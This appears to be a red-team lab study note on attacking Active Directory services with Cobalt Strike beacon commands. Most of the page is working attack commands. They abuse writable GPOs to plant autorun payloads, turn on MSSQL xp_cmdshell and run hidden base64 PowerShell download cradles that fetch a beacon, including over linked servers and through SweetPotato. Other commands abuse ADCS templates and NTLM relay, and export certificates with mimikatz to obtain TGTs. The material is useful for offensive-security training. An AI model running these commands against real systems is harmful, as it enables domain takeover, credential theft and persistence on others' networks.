GPOs

GPOs

modify existing GPOs

search for writable GPOs

beacon> powershell Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }

Resolv the GPO Name and Principal

beacon> powershell Get-DomainGPO -Identity "CN={5059FAC1-5E94-4361-95D3-3BB235A23928},CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" | select displayName, gpcFileSysPath
 
# Who can modify it?
beacon> powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
 
# what does it apply to? (in this case an OU)
beacon> powershell Get-DomainOU -GPLink "{5059FAC1-5E94-4361-95D3-3BB235A23928}" | select distinguishedName
 
# which computers are in the OU?
beacon> powershell Get-DomainComputer -SearchBase "OU=Workstations,DC=dev,DC=cyberbotic,DC=io" | select dnsHostName

Now alter the GPO using SharpGPOAbuse:

beacon> execute-assembly C:\Tools\SharpGPOAbuse\SharpGPOAbuse\bin\Release\SharpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "start /b \\dc-2\software\dns_x64.exe" --GPOName "Vulnerable GPO"

The share was found with: beacon> powershell Find-DomainShare -CheckShareAccessbut this could be stored anywhere where the target computer has access.

create & link a GPO

Search who can create a new group policy:

beacon> powershell Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }

Which OUs can this be linked against?

beacon> powershell Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN,ActiveDirectoryRights,ObjectAceType,SecurityIdentifier | fl
 
# and resolve the ObjectDN/Security-GUID
beacon> powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107

Add PowerShell RSAT modules

# is rset installed?
beacon> powershell Get-Module -List -Name GroupPolicy | select -expand ExportedCommands
 
# create a new GPO
beacon> powershell New-GPO -Name "Evil GPO"
 
# add something to autorun
beacon> powershell Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "C:\Windows\System32\cmd.exe /c \\dc-2\software\dns_x64.exe" -Type ExpandString
 
# apply the new GPO
beacon> powershell Get-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=cyberbotic,DC=io"

MSSQL Servers

Tools:

find and enumerate SQL Servers

beacon> powershell-import C:\Tools\PowerUpSQL\PowerUpSQL.ps1
 
# get instances within domain (searches for SPNs)
beacon> powershell Get-SQLInstanceDomain
 
# can we connect to the database?
beacon> powershell Get-SQLConnectionTest -Instance "sql-2.dev.cyberbotic.io,1433" | fl
 
# get more information about database
beacon> powershell Get-SQLServerInfo -Instance "sql-2.dev.cyberbotic.io,1433"

if there are multiple SQL servers available, we can chain those commands to automate:

beacon> powershell Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo

analyze servers for access users

beacon> execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m whoami

Users need public privilege to perform this enumeration; we can search for potential usersnames that might have that right in the AD:

beacon> powershell Get-DomainGroup -Identity *SQL* | % { Get-DomainGroupMember -Identity $_.distinguishedname | select groupname, membername }

Or attack MSSQL service itself (mssql_svc), e.g., through Kerberoasting.

Query the database

beacon> powershell Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select @@servername"
 
beacon> execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m query -o "select @@servername"
 
proxychains mssqlclient.py -windows-auth DEV/bfarmer@10.10.122.25

HeidiSQL through Proxifier (on Windows)

MSSQL impersonation

MS SQL impersonation, or context switching, is a means which allows the executing user to assume the permissions of another user without needing to know their password. One handy use case for the feature is to allow administrators to impersonate a user for testing purposes, e.g. a user is having a problem and they want to eliminate permissions as an issue.

SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE'; -- search fro grantee_prinicipal_id and grantor_prinicipal_id
 
-- match those IDs
SELECT name, principal_id, type_desc, is_disabled FROM sys.server_principals;

SQLRecon’s impersonate module also does this for us:

beacon> execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m impersonate

Execute commands as other user:

EXECUTE AS login = 'DEV\mssql_svc'; SELECT SYSTEM_USER;

or again use sqlrecon for this:

beacon> execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m iwhoami -i DEV\mssql_svc

MSSQL Command Execution

Usingxp_cmdshell

beacon> powershell Invoke-SQLOSCmd -Instance "sql-2.dev.cyberbotic.io,1433" -Command "whoami" -RawResults

if this fail within a normal sql client enumerate and enable xp_cmdshell

SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell';
 
sp_configure 'Show Advanced Options', 1; RECONFIGURE;
sp_configure 'xp_cmdshell', 1; RECONFIGURE;

combine this to create a connection to a beacon

# prepare download cradle
beacon> powershell New-NetFirewallRule -DisplayName "8080-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8080
 
beacon> rportfwd 8080 127.0.0.1 80

start the exploit:

EXEC xp_cmdshell 'powershell -w hidden -c "iex (new-object net.webclient).downloadstring("""http://wkstn-2:8080/b""")"';

and finally link to the new token

mssql links / lateral movement

SELECT srvname, srvproduct, rpcout FROM master..sysservers;
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell''');
EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io]

beacon> powershell Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433"

execute beacon on the linked server through the initial mssql server

# add new download cradle for sql server
beacon> powershell New-NetFirewallRule -DisplayName "8080-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8080
beacon> rportfwd 8080 127.0.0.1 80

Execute encoded sql query that downloads payload through sql link:

SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAGIAJwApAA==''')

link to the new beacon

mssql privilege escalation

todo research

SQLServer is running as SYSTEM or has SeImpersonatePrivilege, you can check with:

beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe TokenPrivileges

In a nutshell, this privilege allows the user to impersonate a token that it’s able to get a handle to. However, since this account is not a local admin, it can’t just get a handle to a higher-privileged process (e.g. SYSTEM) already running on the machine. A strategy that many authors have come up with is to force a SYSTEM service to authenticate to a rogue service that the attacker creates. This rogue service is then able to impersonate the SYSTEM service whilst it’s trying to authenticate.

beacon> execute-assembly C:\Tools\SweetPotato\bin\Release\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAGMAJwApAA=="

Active Directory Certificate Services

Used for PKI

First search for AD CS CAs:

beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe cas

use vulnerable templates

Find vulnerable templates:

beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe find /vulnerable

In this case we can request a certificate for any domain user

beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:CustomUser /altname:nlamb

Copy the whole certificate (both the private key and certificate) and save it to cert.pem on Ubuntu WSL. Then use the provided openssl command to convert it to pfx format.

ubuntu@DESKTOP-3BSK7NO ~> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
 
ubuntu@DESKTOP-3BSK7NO ~> cat cert.pfx | base64 -w 0

Get a TGT for the user using the certificate (“pass123 was given as password during openssl export”):

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /certificate:MIIM7w[...]ECAggA /password:pass123 /nowrap

ntlm relay to ADCS HTTP endpoints

AD CS services support HTTP enrolment methods and even includes a GUI. This endpoint is usually found at http[s]://<hostname>/certsrv.

An important aspect to be aware of is that you cannot relay NTLM authentication back to the originating machine. We therefore wouldn’t be able to relay a DC to a CA if those services were running on the same machine. This is indeed the case in the RTO lab, as each CA is running on a DC.

To achieve this, we need:

PortBender on Workstation 2 to capture traffic on port 445 and redirect it to port 8445.
A reverse port forward to forward traffic hitting port 8445 to the team server on port 445.
A SOCKS proxy for ntlmrelayx to send traffic back into the network.

attacker@ubuntu ~> sudo proxychains ntlmrelayx.py -t https://10.10.122.10/certsrv/certfnsh.asp -smb2support --adcs --no-http-server

Force Authentication

beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe 10.10.122.30 10.10.123.102

Use S4U2Self trick to get a TGS to move laterally.

check existing certificates for persistence

Use Seatbelt to enumerate stored certificates on host (make sure that certificate is used for client authentication):

beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe Certificates

exoprt certificate:

beacon> mimikatz crypto::certificates /export

You can sync them through: View → Downloads

ubuntu@DESKTOP-3BSK7NO ~> cat /mnt/c/Users/Attacker/Desktop/CURRENT_USER_My_0_Nina\ Lamb.pfx | base64 -w 0

Use rubeus to ask for a TGT, password will be “mimikatz”:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /certificate:MIINeg[...]IH0A== /password:mimikatz /nowrap

If the user has no certificate, we can request one with certify:

beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:User

same can be done with machine accounts

beacon> mimikatz !crypto::certificates /systemstore:local_machine /export
 
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:WKSTN-1$ /enctype:aes256 /certificate:MIINCA[...]IH0A== /password:mimikatz /nowrap
 
# again, we can ask for those through certify
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:Machine /machine

🪴 Quartz 4.0

Explorer

7_exploiting AD services